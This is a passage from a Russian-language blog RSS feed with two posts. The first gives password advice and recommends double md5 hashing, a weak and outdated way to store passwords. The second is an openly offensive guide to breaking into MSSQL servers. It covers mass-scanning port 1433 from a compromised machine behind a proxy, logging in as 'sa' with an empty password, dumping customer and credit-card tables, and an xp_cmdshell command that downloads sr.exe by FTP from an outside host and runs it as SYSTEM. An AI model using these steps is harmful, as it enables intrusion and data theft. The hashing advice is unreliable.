<p>Мне показалось интересным то, что популярные пароли могут изменяться с течением времени. Связано это с несколькими причинами. Популярное в реальной жизни становится распространено и в виртуальной. Так пароль matrix, который в конце 80-х &#8211; начале 90-х использовали разве что математики, с выходом одноименного фильма занимает 29 место в списке популярных паролей. Точно также влияют на выбор пароля и известные музыкальные группы (tatu), книги (Pelevin), программы (<a href="http://pronets.ru/tag/windows/" class="st_tag internal_tag" rel="tag nofollow" title="Posts tagged with Windows">windows</a>). Еще одним важным фактором является популяризация интернета в целом &#8211; в сеть приходит множество новых людей, которые могут и не иметь понятия о компьютерной безопасности. Это приводит к широкому использованию простейших паролей, а следовательно и увеличению числа взломов.<br />
Coda</p>
<p>Проанализировав довольно большое количество паролей, я хотел бы дать несколько советов, которые, как мне кажутся, помогут вам избежать утечки информации. Многие из них банальны, но как показала практика не соблюдаются в большинстве случаев, поэтому напомнить их будет не лишним.</p>
<p>Советы пользователям. Самый важный совет &#8211; никогда не используйте одинаковые пароли для доступа к разным системам! Даже если он кажется абсолютно устойчивым и надежным, например V1!2cEqP,@#19r. Взломщик может получить ваш пароль для доступа к одной системе, используя какую-либо уязвимость в ней. И это будет не ваша вина, а вина программистов. Но если он, получив один пароль, сможет получить контроль над всей вашей деятельностью в сети &#8211; это будет целиком на вашей совести.</p>
<p>Теперь поговорим о выборе пароля. Никогда не используйте пароли, состоящие только из цифр. Количество возможных комбинаций из цифр невелико (при желании &#8211; рассчитайте его по формуле) и такой пароль может быть подобран относительно быстро даже при удаленной атаке. Проверьте пароль, используемый вами &#8211; если в свободной таблице он попадает в оранжевые ячейки, то можно утверждать, что он не надежен. Ваша цель при создании пароля &#8211; достичь максимально разумного числа символов в исходном наборе (используйте разный регистр и специальные символы). Не используйте осмысленные пароли и их модификации. Взломщику не составит большого труда подобрать его. Не думайте, что система блокирования IP-адреса после определенного числа попыток войти в систему с неверным паролем защитит вас &#8211; посмотрите список прокси-серверов на http://samair.ru/proxy/ и убедитесь, что это лишь ширма, а не защита.</p>
<p>Если ваш пароль ненадежен &#8211; смените его сейчас, не ждите, пока кто-нибудь получит доступ к вашей конфиденциальной информации. Вполне возможно, что уже сейчас почта с вашего почтового ящика перенаправляется конкурентам, а вы даже не подозреваете об этом. Очень рекомендуется менять пароли для доступа к важным для вас сервисам хотя бы раз в месяц.</p>
<p>Еще один важный аспект защиты &#8211; системы восстановления забытых паролей. Многие выбирают вполне достойные пароли, которые не по зубам взломщикам, но оказываются уязвимыми через эти системы.</p>
<p>Во-первых, никогда не указывайте несуществующий ящик в качестве альтернативного почтового адреса, на который будет высылаться пароль, &#8211; взломщик может воспользоваться этим. Зарегистрировав этот аккаунт на себя, получение вашего пароля будет делом нескольких минут. Во-вторых, очень важным является контрольный вопрос, который позволяет восстановить забытый пароль. Никогда не указывайте в ответе на него свои личные данные (год рождения, кличку собаки, девичью фамилию матери) &#8211; взломщик может с легкостью получить эту информацию, используя либо поиск в интернете, либо социальную инженерию. Во втором случае вы или ваши близкие (сослуживцы, родственники) сами с удовольствием раскроете взломщику эту информацию. Идеальным вариантом будет указать в ответе на контрольный вопрос случайный набор символов.</p>
<p>Еще несколько банальных советов. Регулярно обновляйте антивирусный софт, установите на ваш компьютер файрвол. Используйте альтернативный браузер (Opera) и почтовый клиент (The Bat!). Львиная доля уязвимостей в ПО, используемых взломщиками, приходится на продукты компании Microsoft.</p>
<p>Советы администратору. Введите систему контроля над паролями, которые выбирают пользователи. Лучше всего требовать наличия в нем букв и цифр, причем цифр не в начале или конце пароля, а в середине (хотя это и не убережет от паролей типа pass123pass, но множество глупых паролей будет отсеяно). Ограничивайте минимальную длину пароля хотя бы шестью символами. Не ограничивайте максимальную длину пароля (на мой взгляд, все разумные причины для этого не актуальны на текущей стадии развития аппаратного обеспечения).</p>
<p>Продумайте систему восстановления забытых паролей. Я считаю, что восстановление путем ответа на контрольный вопрос &#8211; недостаточно надежная схема. Множество паролей взламывается именно через контрольный вопрос. Если вы не хотите потом разбираться, кому на самом деле принадлежит учетная запись, не используйте такую систему. На мой взгляд, хороший метод восстановления пароля &#8211; это высылка на указанный при регистрации почтовый ящик. Желательно высылать не старый пароль, а заново сгенерированный. Это поможет избежать шпионажа или действий от лица другого человека, а также взлома аккаунтов пользователя на других системах.</p>
<p>В большинстве сетевых приложений сейчас используется аутентификация на базе алгоритма md5, который, хоть и надежен, довольно неустойчив при использовании слабых паролей. Существует разные системы для защиты хэшей, хранящихся в базе данных, от взлома методом грубой силы. Например я встречал такой совет: &#8220;храните не весь хэш, а лишь его первые 16 символов, что затруднит атакующему ввод таких &#8220;огрызков&#8221; в программу для взлома, а вероятность совпадения первых 16 байт для разных паролей довольно мала.&#8221; Более того, я встречал такой метод реализованным на практике. Это не самый лучший выход, так как допускает коллизионность паролей, а реальных препятствий взломщику не создает никаких.</p>
<p>Самым простым в реализации и дающим защиту от большинства взломщиков мне кажется следующий метод. Храните в базе данных не хэш пароля, а хэш хэша, то есть значение функции md5(md5(<a href="http://pronets.ru/tag/password/" class="st_tag internal_tag" rel="tag nofollow" title="Posts tagged with Password">password</a>)). При логине пароль просто хэшируется два раза и полученное значение сверяется с хранящимся на сервере. Взломщик же сталкивается с несколькими трудностями. Во-первых ему надо еще определить что это не хэш самого пароля (а с первого взгляда это сделать невозможно &#8211; сказывается свойство, по которому результатом работы функции является значение фиксированной длинны). Во-вторых &#8211; публичных программ для взлома такого типа не существует. Придется или разрабатывать свою программу или идти на какие-либо ухищрения. Это даст защиту от взломщиков-киддисов (а их сейчас большинство), которые используют программы, разработанные другими, и уязвимости, найденные не ими. Можно пойти дальше и хранить пароль, хэшированный не два, а три или более раза. В этом случае еще и существенно замедляется скорость локального перебора паролей.</p>
<p>P.S. Все примеры паролей, приведенные в статье &#8211; реальные.</p>

	<b>Метки:</b> <a href="http://pronets.ru/tag/vyibiraemyie/" title="Выбираемые" rel="tag nofollow">Выбираемые</a>, <a href="http://pronets.ru/tag/paroli/" title="Пароли" rel="tag nofollow">Пароли</a>, <a href="http://pronets.ru/tag/password/" title="Password" rel="tag nofollow">Password</a>, <a href="http://pronets.ru/tag/parol/" title="Пароль" rel="tag nofollow">Пароль</a><br /><br />

	<ul class="st-related-posts">
	<li><a href="http://pronets.ru/vostanovit-parol-icq/" title="Как использовать систему восстановления паролей ICQ? (30/07/2008)">Как использовать систему восстановления паролей ICQ?</a> (0)</li>
	<li><a href="http://pronets.ru/voznikayuschie-oshibki-icq-klienta-jimm/" title="Возникающие ошибки ICQ-клиента Jimm (30/07/2008)">Возникающие ошибки ICQ-клиента Jimm</a> (0)</li>
	<li><a href="http://pronets.ru/kak-zaschitit-nomer-icq-ot-vzloma/" title="Как защитить номер ICQ от взлома (30/07/2008)">Как защитить номер ICQ от взлома</a> (0)</li>
	<li><a href="http://pronets.ru/novyie-sistemyi-paroley/" title="Новые системы паролей (16/01/2009)">Новые системы паролей</a> (0)</li>
	<li><a href="http://pronets.ru/parol-na-adsl-modeme/" title="Пароль на ADSL модеме (08/12/2009)">Пароль на ADSL модеме</a> (0)</li>
</ul>

]]></content:encoded>
			<wfw:commentRss>http://pronets.ru/chasto-vyibiraemyie-paroli/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Простой способ проникнуть в SQL-сервер</title>
		<link>http://pronets.ru/prostoy-sposob-proniknut-v-sql-server/</link>
		<comments>http://pronets.ru/prostoy-sposob-proniknut-v-sql-server/#comments</comments>
		<pubDate>Thu, 11 Sep 2008 20:17:28 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Всё о Взломе]]></category>
		<category><![CDATA[Server]]></category>
		<category><![CDATA[SQL]]></category>
		<category><![CDATA[взлом]]></category>
		<category><![CDATA[Взломать]]></category>
		<category><![CDATA[Защита]]></category>

		<guid isPermaLink="false">http://pronets.ru/?p=188</guid>
		<description><![CDATA[В статье СОЗНАТЕЛЬНО пропущен один ВАЖНЫЙ момент, автор заранее предупреждает: ЕСЛИ ВЫ НЕ ЗНАКОМЫ С ПРОЦЕДУРОЙ АУТЕНТИФИКАЦИИ MSSQL сервера И НЕ ЗНАЕТЕ, КАКИЕ НУЖНО ПРИНЯТЬ МЕРЫ ДЛЯ ЕЕ МОДИФИКАЦИИ – В СЛУЧАЕ ПРИМЕНЕНИЯ ОПИСАННОЙ НИЖЕ МЕТОДИКИ, ВАС _ОБЯЗАТЕЛЬНО_ НАЙДУТ! ТЕМ БОЛЕЕ, ЕСЛИ ВЫ ПОЛЬЗУЕТЕСЬ ПОСТОЯННЫМ, ВЫСОКОСКОРОСТНЫМ СОЕДИНЕНИЕМ С ИНТЕРНЕТОМ…

Что требуется:
дистрибутив MSSQL-server 2000
Shadow Remote Administrator (SRA)
NEC [...]]]></description>
			<content:encoded><![CDATA[<p>В статье СОЗНАТЕЛЬНО пропущен один ВАЖНЫЙ момент, автор заранее предупреждает: ЕСЛИ ВЫ НЕ ЗНАКОМЫ С ПРОЦЕДУРОЙ АУТЕНТИФИКАЦИИ MSSQL сервера И НЕ ЗНАЕТЕ, КАКИЕ НУЖНО ПРИНЯТЬ МЕРЫ ДЛЯ ЕЕ МОДИФИКАЦИИ – В СЛУЧАЕ ПРИМЕНЕНИЯ ОПИСАННОЙ НИЖЕ МЕТОДИКИ, ВАС _ОБЯЗАТЕЛЬНО_ НАЙДУТ! ТЕМ БОЛЕЕ, ЕСЛИ ВЫ ПОЛЬЗУЕТЕСЬ ПОСТОЯННЫМ, ВЫСОКОСКОРОСТНЫМ СОЕДИНЕНИЕМ С ИНТЕРНЕТОМ…</p>
<p><span id="more-188"></span><br />
Что требуется:</p>
<p>дистрибутив MSSQL-<a href="http://pronets.ru/tag/server/" class="st_tag internal_tag" rel="tag nofollow" title="Posts tagged with Server">server</a> 2000<br />
Shadow Remote Administrator (SRA)<br />
NEC e-Border client<br />
ломаная машина NT4.0 или W2K<br />
постоянное, не менее 64 kbps соединение с интернетом<br />
один-два пальца на руках<br />
пару-тройку суток времени<br />
Алгоритм:</p>
<p>1. Устанавливаем MSSQL, нам потребуется только клиентская часть <a href="http://pronets.ru/tag/sql/" class="st_tag internal_tag" rel="tag nofollow" title="Posts tagged with SQL">SQL</a> Query Analyzer (QA).<br />
2. Устанавливаем NEC e-Border дабы нас сходу не отловили и не пришли в гости.<br />
3. На ломаную машину устанавливаем SRA, коннектимся к нему и запускаем на нем Socks-5 сервер на любом нестандартном порту (входит в SRA).<br />
4. На своем e-Bordere прописываем IP адрес ломаной машины с запущенным соксом.<br />
5. На ломаной машине запускаем FTP-сервер (входит в SRA), ОБЯЗАТЕЛЬНО на 21 порту.<br />
6. Кладем в корень этого запущенного FTP серверную часть SRA (по умолчанию C:\).<br />
7. Запускаем в SRA порт-сканнер, забиваем туда подсетку класса A (типа 4.0.0.1 &#8211; 4.255.255.255), порт нам нужен 1433.<br />
8. Выключаем монитор и впадаем в трехдневный запой.</p>
<p>По прошествии трех дней, после посещения нарколога, и принятия холодного душа приступаем, собственно к ПРОЦЕССУ.</p>
<p>В настоящий момент, вы уже имеете массу машин, про которые известно, что на них запущен MSSQL-сервер, который слушает на стандартном порту 1433. Вам не известно, какие из этих серверов, были установлены администраторами-недоучками, типа Вас, читающих данную статью с интересом, и не позаботившиеся о том, чтобы сменить стандартный логин SA с ПУСТЫМ паролем, на что-нибудь более приличное.</p>
<p>Запускаем QA, в выскочившем окошке вводим:</p>
<p>- <a href="http://pronets.ru/tag/sql/" class="st_tag internal_tag" rel="tag nofollow" title="Posts tagged with SQL">SQL</a> <a href="http://pronets.ru/tag/server/" class="st_tag internal_tag" rel="tag nofollow" title="Posts tagged with Server">Server</a>: IP из списка насканенного с помощью SRA<br />
- Галочку Start <a href="http://pronets.ru/tag/sql/" class="st_tag internal_tag" rel="tag nofollow" title="Posts tagged with SQL">SQL</a> if it is stopped НЕ СТАВИМ<br />
- Connect Using: <a href="http://pronets.ru/tag/sql/" class="st_tag internal_tag" rel="tag nofollow" title="Posts tagged with SQL">SQL</a> <a href="http://pronets.ru/tag/server/" class="st_tag internal_tag" rel="tag nofollow" title="Posts tagged with Server">Server</a> authentication<br />
- Login name: sa<br />
- <a href="http://pronets.ru/tag/password/" class="st_tag internal_tag" rel="tag nofollow" title="Posts tagged with Password">Password</a>: пустое поле</p>
<p>Жмем «ОК»</p>
<p>В случае появления сообщений типа: Login filed for user “sa”, Not trusted <a href="http://pronets.ru/tag/sql/" class="st_tag internal_tag" rel="tag nofollow" title="Posts tagged with SQL">SQL</a> <a href="http://pronets.ru/tag/server/" class="st_tag internal_tag" rel="tag nofollow" title="Posts tagged with Server">server</a> connection etc, жмем «ОК» и пробуем следующий IP из списка.</p>
<p>Ну наконец, вместо надоевшего Login filed, получаем просто вдруг открывшееся, девственно белое, окошко с заголовком типа “Query 12.11.32.45.master.sa” – ВЫ ЗАШЛИ на <a href="http://pronets.ru/tag/sql/" class="st_tag internal_tag" rel="tag nofollow" title="Posts tagged with SQL">SQL</a>-сервер, поздравляю =)</p>
<p>Жмем F8, слева появляется список баз данных, находящихся на этом сервере. Сразу хочу предупредить: базы с именами Master, model, msdb, Northwind, pubs, tempdb являются служебными или поставляются с MSSQL как примеры – смысла их просматривать нет – только в качестве самообразования.</p>
<p>Если в списке баз вы видите чего-нибудь типа ONLINESHOP (=)) жмите на крестик слева от названия базы, в выпавшем списке – на крестик слева от User Tables. Перед вами список таблиц базы данных. При нажатии на крестик слева от названия таблицы, вы получите список названий полей в таблице.</p>
<p>По собственному опыту убивания времени, могу судить, что ПОДАВЛЯЮЩЕЕ большинство имен таблиц и полей НЕСЕТ большую смысловую нагрузку – если в базе есть номера карточек, то скорее всего так и будет написано CreditCardNumber – или в названии таблицы, или в названии поля таблицы.</p>
<p>Как просмотреть записи в таблицах.</p>
<p>1. В выпадающем списке сверху окна QA выбираем название нужной базы.<br />
2. Портим девственную белизну окна запроса буквочками типа:</p>
<p>select top 100 * from users</p>
<p>этот запрос вернет верхние 100 строк из таблицы USERS</p>
<p>select count(*) from users</p>
<p>этот запрос покажет количество строк в таблице USERS</p>
<p>xp_cmdshell &#8216;cmd /c echo Admin&gt;ftp1&amp;cmd /c echo <a href="http://pronets.ru/tag/password/" class="st_tag internal_tag" rel="tag nofollow" title="Posts tagged with Password">password</a>&gt;&gt;ftp1&amp;cmd /c echo binary&gt;&gt;ftp1&amp;cmd /c echo get sr.exe&gt;&gt;ftp1&amp;cmd /c echo quit&gt;&gt;ftp1&amp;cmd /c ftp -s:ftp1 -d 12.12.12.12&#8242;</p>
<p>этот запрос скачает с FTP-сервера 12.12.12.12 с логином Admin и паролем <a href="http://pronets.ru/tag/password/" class="st_tag internal_tag" rel="tag nofollow" title="Posts tagged with Password">password</a> файл sr.exe</p>
<p>xp_cmdshell &#8216;cmd /c sr.exe&#8217;</p>
<p>а этот запрос, запустит sr.exe на удаленной машине с правами <a href="http://pronets.ru/tag/sql/" class="st_tag internal_tag" rel="tag nofollow" title="Posts tagged with SQL">SQL</a>-сервера – а это, как правило, или SYSTEM или DomainAdmins.</p>
<p>Если кто еще не догадался, xp_cmdshell ‘dir c:\’ покажет содержимое диска C:\</p>

	<b>Метки:</b> <a href="http://pronets.ru/tag/vzlom/" title="взлом" rel="tag nofollow">взлом</a>, <a href="http://pronets.ru/tag/zaschita/" title="Защита" rel="tag nofollow">Защита</a>, <a href="http://pronets.ru/tag/sql/" title="SQL" rel="tag nofollow">SQL</a>, <a href="http://pronets.ru/tag/server/" title="Server" rel="tag nofollow">Server</a>, <a href="http://pronets.ru/tag/vzlomat/" title="Взломать" rel="tag nofollow">Взломать</a><br /><br />

	<ul class="st-related-posts">
	<li><a href="http://pronets.ru/problemyi-servera/" title="Проблемы сервера (30/06/2008)">Проблемы сервера</a> (0)</li>
	<li><a href="http://pronets.ru/windows-2008-obzor-novoy-servernoy-os-ot-microsoft/" title="Windows 2008 &#8211; обзор новой серверной ОС от Microsoft (16/01/2009)">Windows 2008 &#8211; обзор новой серверной ОС от Microsoft</a> (0)</li>
	<li><a href="http://pronets.ru/proksi/" title="Прокси (Proxy) (15/09/2008)">Прокси (Proxy)</a> (0)</li>
	<li><a href="http://pronets.ru/lokalnyiy-vzlom-windows-xp/" title="Локальный взлом Windows XP (12/09/2008)">Локальный взлом Windows XP</a> (0)</li>
	<li><a href="http://pronets.ru/bezopasnost-windows-vista-vzlom-adekvaten-zaschite/" title="Безопасность Windows Vista &#8211; взлом адекватен защите (16/01/2009)">Безопасность Windows Vista &#8211; взлом адекватен защите</a> (0)</li>
</ul>

]]></content:encoded>
			<wfw:commentRss>http://pronets.ru/prostoy-sposob-proniknut-v-sql-server/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
